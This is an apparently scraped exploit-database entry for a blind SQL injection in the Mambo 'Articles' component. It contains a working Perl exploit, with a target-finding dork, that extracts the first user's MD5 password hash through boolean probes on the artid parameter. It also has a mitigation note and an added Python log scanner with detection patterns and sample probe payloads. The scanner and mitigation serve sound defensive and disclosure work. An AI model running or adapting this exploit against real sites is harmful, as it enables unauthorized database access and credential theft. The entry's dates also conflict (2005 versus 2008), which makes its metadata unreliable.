Vendor: Mambo Component Articles
By: Ded MustD!e
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Mambo Component Articles
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Mambo Component Articles Blind SQL Injection Exploit

This exploit targets a blind SQL injection vulnerability in the Mambo Component Articles: the `artid` parameter of `index.php?option=articles&task=viewarticle` is used in a SQL query without validation. It allows an attacker to extract the MD5 hash of the password of the first user in the database. The exploit requires a valid article ID and the path to the Mambo installation. It works by sending a series of specially crafted HTTP requests, each appending a true/false condition on one character of the hash, and checking whether the response still contains the normal article page (the script looks for the string "Back") to decide the value of that character before moving on to the next one.
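As a defender-side companion to the description above, the following is an added example (not part of the Exploit-DB entry or of Mambo itself): a Python scan over constructed Apache access-log lines that flags non-integer `artid` values on the articles component, recognises the boolean probe shape this exploit sends, and reports clients that issue enough probes to be extracting a hash character by character. The log format regex, the probe pattern and the sample lines are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache combined-log line: client IP ... "METHOD target ..." (constructed regex)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*"')

# Shape of the boolean probe used against this component: a conditional appended to
# artid that wraps a subselect in ascii()/SUBSTRING() and compares it to a constant.
PROBE_RE = re.compile(r'\b(?:and|or)\b.*\b(?:ascii|substring|mid|select)\b.*=\s*\d+', re.I)

def inspect_request(url):
    """Return None for a well-formed request, else a finding about the artid value."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)  # decodes %20 and '+'
    if qs.get('option') != ['articles'] or 'artid' not in qs:
        return None
    artid = qs['artid'][0]
    if re.fullmatch(r'\d+', artid):
        return None  # an integer article id is the only legitimate form
    return {'artid': artid, 'blind_probe': bool(PROBE_RE.search(artid))}

def scan_log(lines, threshold=3):
    """Flag tampered artid values and report clients that sent >= threshold blind
    probes: character-by-character extraction needs many near-identical requests."""
    findings, probes_per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        hit = inspect_request(m['url'])
        if hit:
            hit['ip'] = m['ip']
            findings.append(hit)
            probes_per_ip[m['ip']] += hit['blind_probe']
    extractors = sorted(ip for ip, n in probes_per_ip.items() if n >= threshold)
    return findings, extractors

# Constructed sample log: one legitimate view and three probes (testing whether the
# first hash character is '0', '1', '2') from 203.0.113.9, and a broken link from
# 198.51.100.7 whose artid is non-numeric but not SQL.
_REQ = '"GET /joomla/index.php?option=articles&task=viewarticle&artid={} HTTP/1.1" 200 5120'
_PROBE = ('2%20and%20ascii(SUBSTRING((SELECT%20password%20FROM%20mos_users'
          '%20LIMIT%200,1),1,1))={}')
SAMPLE_LOG = [
    '203.0.113.9 - - [25/Jun/2008:10:00:00 +0000] ' + _REQ.format('2'),
    *('203.0.113.9 - - [25/Jun/2008:10:00:0%d +0000] ' % n + _REQ.format(_PROBE.format(47 + n))
      for n in range(1, 4)),
    '198.51.100.7 - - [25/Jun/2008:10:01:00 +0000] ' + _REQ.format('abc'),
]
```

Running `scan_log(SAMPLE_LOG)` yields four findings (three probes and the `abc` link) and lists 203.0.113.9 as the only client over the probe threshold.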

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input, here the `artid` parameter, is validated before it reaches a SQL query (an article id should only ever be an integer) and is bound to the query as a parameter rather than concatenated into the SQL string.

Exploit-DB raw data:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use Getopt::Long;

$| = 1;   # unbuffer STDOUT so the buffered print() lines and the syswrite() output stay in order

if(!$ARGV[1])
{
 print " \n";
 print " #######################################################################\n";
 print "  #   Mambo Component Articles Blind SQL Injection Exploit #\n";
 print "  #   Author:Ded MustD!e [www.antichat.ru] #\n";
 print "  # #\n";
 print "  #   Dork :   inurl:option=articles artid #\n";
 print "  #   Usage:   perl exploit.pl host path <options> #\n";
 print "  #   Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n";
 print "  # #\n";
 print "  #   Options: #\n";
 print "  #     -a   valid Article id #\n";
 print " #######################################################################\n";
 exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $aid     = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
 $userid = $options{"u"};
}

if($options{"a"})
{
 $aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
 my $f = 0;
 my $h = 48;
 while(!$f && $h <= 57)
 {
   if(istrue2($host, $path, $userid, $aid, $i, $h))
   {
     $f = 1;
     syswrite(STDOUT, chr($h), 1);
   }
   $h++;
 }
 if(!$f)
 {
   $h = 97;
   while(!$f && $h <= 122)
   {
     if(istrue2($host, $path, $userid, $aid, $i, $h))
     {
       $f = 1;
       syswrite(STDOUT, chr($h), 1);
     }
     $h++;
   }
 }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
 my $host  = shift;
 my $path  = shift;
 my $uid   = shift;
 my $aid   = shift;
 my $i     = shift;
 my $h     = shift;

 my $ua = LWP::UserAgent->new;
 my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";

 if($options{"p"})
 {
   $ua->proxy('http', "http://".$options{"p"});
 }

 my $resp = $ua->get($query);
 my $content = $resp->content;
 my $regexp = "Back";

 if($content =~ /$regexp/)
 {
   return 1;
 }
 else
 {
   return 0;
 }

}

# milw0rm.com [2008-06-25]